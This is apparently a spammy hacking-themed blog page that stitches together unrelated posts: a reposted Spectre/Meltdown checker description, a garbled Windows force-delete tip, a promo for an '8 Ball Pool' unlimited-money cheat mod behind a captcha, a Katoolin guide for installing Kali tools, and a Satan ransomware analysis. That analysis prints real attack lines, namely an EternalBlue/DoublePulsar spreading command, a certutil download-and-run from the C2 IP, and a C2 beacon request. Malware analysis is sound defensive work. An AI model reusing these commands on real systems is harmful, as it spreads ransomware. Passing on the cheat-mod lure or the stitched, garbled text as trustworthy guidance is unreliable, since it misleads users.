Monday, 23 April 2018

Spectre & Meltdown checker for Linux


Spectre & Meltdown Checker
   A shell script to tell if your system is vulnerable against the 3 "speculative execution" CVEs that were made public early 2018.



   Supported operating systems:

    * Linux (all versions, flavors and distros)
    * BSD (FreeBSD, NetBSD, DragonFlyBSD)

   Supported architectures:
    * x86 (32 bits)
    * amd64/x86_64 (64 bits)
    * ARM and ARM64
    * other architectures will work, but mitigations (if they exist) might not always be detected

   For Linux systems, the script will detect mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number and the distribution (such as Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, ...), it also works if you've compiled your own kernel.

   For BSD systems, the detection will work as long as the BSD you're using supports cpuctl and linprocfs (this is not the case of OpenBSD for example).

Easy way to run the script
   Get the latest version of the script using curl or wget
      curl -L https://meltdown.ovh -o spectre-meltdown-checker.sh
      wget https://meltdown.ovh -O spectre-meltdown-checker.sh

   Inspect the script. You never blindly run scripts you downloaded from the Internet, do you?
      vim spectre-meltdown-checker.sh

   When you're ready, run the script as root
      chmod +x spectre-meltdown-checker.sh
      sudo ./spectre-meltdown-checker.sh


Example of script output
   Intel Haswell CPU running under Ubuntu 16.04 LTS



   AMD Ryzen running under OpenSUSE Tumbleweed

   Batch mode (JSON flavor)

Quick summary of the CVEs
   CVE-2017-5753 bounds check bypass (Spectre Variant 1)
    * Impact: Kernel & all software
    * Mitigation: recompile software and kernel with a modified compiler that introduces the LFENCE opcode at the proper positions in the resulting code
    * Performance impact of the mitigation: negligible

   CVE-2017-5715 branch target injection (Spectre Variant 2)
    * Impact: Kernel
    * Mitigation 1: new opcode via microcode update that should be used by up to date compilers to protect the BTB (by flushing indirect branch predictors)
    * Mitigation 2: introducing "retpoline" into compilers, and recompile software/OS with it
    * Performance impact of the mitigation: high for mitigation 1, medium for mitigation 2, depending on your CPU

CVE-2017-5754 rogue data cache load (Meltdown)
    * Impact: Kernel
    * Mitigation: updated kernel (with PTI/KPTI patches), updating the kernel is enough
    * Performance impact of the mitigation: low to medium

Disclaimer
   This tool does its best to determine whether your system is immune (or has proper mitigations in place) for the collectively named "speculative execution" vulnerabilities. It doesn't attempt to run any kind of exploit, and can't guarantee that your system is secure, but rather helps you verifying whether your system has the known correct mitigations in place. However, some mitigations could also exist in your kernel that this script doesn't know (yet) how to detect, or it might falsely detect mitigations that in the end don't work as expected (for example, on backported or modified kernels).

Your system exposure also depends on your CPU. As of now, AMD and ARM processors are marked as immune to some or all of these vulnerabilities (except some specific ARM models). All Intel processors manufactured since circa 1995 are thought to be vulnerable, except some specific/old models, such as some early Atoms. Whatever processor one uses, one might seek more information from the manufacturer of that processor and/or of the device in which it runs.
   The nature of the discovered vulnerabilities being quite new, the landscape of vulnerable processors can be expected to change over time, which is why this script makes the assumption that all CPUs are vulnerable, except if the manufacturer explicitly stated otherwise in a verifiable public announcement.
   Please also note that for Spectre vulnerabilities, all software can possibly be exploited, this tool only verifies that the kernel (which is the core of the system) you're using has the proper protections in place. Verifying all the other software is out of the scope of this tool. As a general measure, ensure you always have the most up to date stable versions of all the software you use, especially for those who are exposed to the world, such as network daemons and browsers.
   This tool has been released in the hope that it'll be useful, but don't use it to jump to conclusions about your security. 


By at No comments:
Labels:forex, iqoption, pubg Hacked

[WARHOX]HOW TO DELETE ANY ANY ANY FILE,FOLGER,GAME,etc...................................

DISCLAIMER: This Channel DOES NOT Promote or encourage Any illegal activities , all contents provided by This Channel is meant for EDUCATIONAL PURPOSE only . Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.


-------------------------------------------------------------
how to delete an undeleteable file or folder go to "run" (windows+R) open cmd and type cd /d (right click go to properties) and copy lacation: paste lacation press <enter> type:::::::::::: dir /x find file name type:::::::::::: rmdir /q /s_<file name> now U can see the file is deleted
-------------------------------------------------------------
By at No comments:

Sunday, 22 April 2018

8 Ball Pool v 3.13.4 Unlimited Force Mod By Game Killer

8 Ball Pool - UNLIMITED MONEY


👇FEATURES OF THIS HACK👇

(1) UNLIMITED MONEY

(2) UNLIMITED FORCE ON ALL CUE

(3) SEMI GUIDELINE MOD

(4) UPDATED VERSION

(5) GAME KILLER MOD ENABLE

(6) *NO ROOT*

(7) Etc...






Fill The Captcha


To Luarn How To Hack Any Games Subscribe Hack Now Channel


By at No comments:

Install Kali Linux tools on Lubuntu/Ubuntu

Install Kali Linux tools on Lubuntu with Katoolin
1, Open LXTerminal (Lubuntu) or Terminal (Ubuntu). Update the package lists and install Git:
   sudo apt update && sudo apt install git
LXTerminal
2, Download and install Katoolin:
   git clone https://github.com/LionSec/katoolin && sudo cp katoolin/katoolin.py /usr/bin/katoolin
   sudo chmod +x /usr/bin/katoolin
   sudo katoolin

3, To install Kali Linux tools, add and update Kali Linux repositories:
   1 (Add Kali Linux repositories & Update) > 1 (Add Kali Linux repositories) and 2 (Update)

4, Install classismenu indicator:
   gohome > 3 (classismenu indicator) and y (Yes)

5, Next, install the Kali Linux menu to categorize the tools:
   gohome > 4 (Install Kali menu) and y (Yes)

6, Now, install all Kali Linux tools
   gohome > 2 (View Categories) > 0 (All)

   Or you can install some Kali Linux tools at will. For example, you only want to install SET (Social-Engineer Toolkit):
   gohome > 2 (View Categories) > 8 (Exploitation Tools) > 13 (SET)

7, Open new LXTerminal (Lubuntu) or Terminal (Ubuntu) window. To open SET, enter this command: sudo setoolkit

8, Layout of the Lubuntu menu after installing Kali Linux tools
Kali Linux menu on Lubuntu
Read more: Katoolin Install pentest tools from Kali Linux on GNU/Linux

Join the Telegram channel with me
By at No comments:
Labels:forex, iqoption, pubg Hacked

Saturday, 21 April 2018

Satan ransomware adds EternalBlue exploit


Today, MalwareHunterTeam reached out to me about a possible new variant of Satan ransomware.

Satan ransomware itself has been around since January 2017 as reported by Bleeping Computer.

In this blog post we'll analyse a new version of the infamous Satan ransomware, which since November 2017 has been using the EternalBlue exploit to spread via the network, and consequently encrypt files.


Analysis

First up is a file inconspicuously named "sts.exe", which may refer to "Satan spreader".


The file is packed with PECompact 2, and is therefore only 30KB in filesize. 

Notably, Satan has used different packers in multiple campaigns, for example, it has also used UPX and WinUpack. This is possibly due to a packer option in the Satan RaaS builder. Fun fact: Iron ransomware, which may be a spin-off from Satan, has used VMProtect.

"sts.exe" acts as a simple downloader, and will download two new files, both SFX archives, and extract them with a given password:


Figure 1 - download and extract two new files

Both files will be downloaded from 198.55.107[.]149, and use a custom User-Agent "RookIE/1.0", which seems a rather unique User-Agent.
  • ms.exe has password: iamsatancryptor
  • client.exe has password: abcdefghijklmn
It appears the Satan ransomware developers showcase some sense of humor by using the password "iamsatancryptor". 

Once the user has executed "sts.exe", they will get the following UAC prompt, if enabled:

Figure 2 - UAC prompt

Client.exe (94868520b220d57ec9df605839128c9b) is, as mentioned earlier, an SFX archive and will hold the actual Satan ransomware, named "Cryptor.exe". Figure 2 shows the command line options.

Curiously, and thanks to the s2 option, the start dialog will be hidden, but the extraction progress is displayed - this means we need to click through to install the ransomware. Even more curious: the setup is in Chinese.

Figure 3 - End of setup screen

ms.exe (770ddc649b8784989eed4cee10e8aa04) on the other hand will drop and load the EternalBlue exploit, and starts scanning for vulnerable hosts. Required files will be dropped in the C:\ProgramData folder, as seen in Figure 3. Note it uses a publicly available implementation of the exploit - it does not appear to use its own.

The infection of other machines on the network will be achieved with the following command:

cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp 

We can then see an attempt to spread the ransomware to other machine in the same network:

Figure 4 - Spreading attempt over SMB, port 445

down64.dll (17f8d5aff617bb729fcc79be322fcb67) will be loaded in memory using DoublePulsar, and executes the following command:

cmd.exe /c certutil.exe -urlcache -split -f http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\sts.exe

This will be used for planting sts.exe on other machines in the network, and will consequently be executed.

Satan ransomware itself, which is contained in Client.exe, will be dropped to C:\Cryptor.exe.

This payload is also packed with PECompact 2. As usual, any database-related services and processes will be stopped and killed, which it does to also encrypt those files possibly in use by another process.

Figure 5 - Database-related processes

What's new in this version of Satan, is that the exclusion list has changed slightly - it will not encrypt files with the following words in its path:

windows, python2, python3, microsoft games, boot, i386, ST_V22, intel, dvd maker, recycle, libs, all users, 360rec, 360sec, 360sand, favorites, common files, internet explorer, msbuild, public, 360downloads, windows defen, windows mail, windows media pl, windows nt, windows photo viewer, windows sidebar, default user

This exclusion list is reminiscent of Iron ransomware. (or vice-versa)

Satan will, after encryption, automatically open the following ransomware note: C:\_How_to_decrypt_files.txt:


Figure 6 - Ransom note


The note is, as usual, in English, Chinese and Korean, and demands the user to pay 0.3 BTC. Satan will prepend filenames with its email address, satan_pro@mail.ru, and append extensions with .satan. For example: [satan_pro@mail.ru]Desert.jpg.satan

BTC Wallet: 14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo 
Email: satan_pro@mail.ru
Note: _How_to_decrypt_files.txt

It appears one person has already paid 0.2 BTC:
https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo

Satan will create a unique mutex, SATANAPP, so the ransomware won't run twice. It will also generate a unique hardware ID and sends this to the C2 server:

GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
HTTP/1.1 
Connection: Keep-Alive 
User-Agent: Winnet Client 
Host: 198.55.107.149

As mentioned in the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017 last year. For example, 25005f06e9b45fad836641b19b96f4b3 is another downloader which works similar to what is posted in this blog. It would fetch the following files:

2017-11-20 18:35:17 UTC ( 5 months ago )

For additional reading, read this excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.


Disinfection

You may want to verify if any of the following files or folders exist:

  • C:\sts.exe
  • C:\Cryptor.exe
  • C:\ProgramData\ms.exe
  • C:\ProgramData\client.exe
  • C:\Windows\Temp\KSession

Prevention

  • Enable UAC
  • Enable Windows Update, and install updates (especially verify if MS17-010 is installed)
  • Install an antivirus, and keep it up-to-date and running
  • Restrict, where possible, access to shares (ACLs)
  • Create backups! (and test them)
More ransomware prevention can be found here.


Conclusion

Satan is not the first ransomware to use EternalBlue (for example, WannaCry), however, it does appear the developers of Satan are continuously improving and adding features to its ransomware.

Prevention is always better than disinfection/decryption.




IOCs

By at No comments:
Labels:forex, iqoption, pubg Hacked , , , , , ,
Subscribe to: Posts (Atom)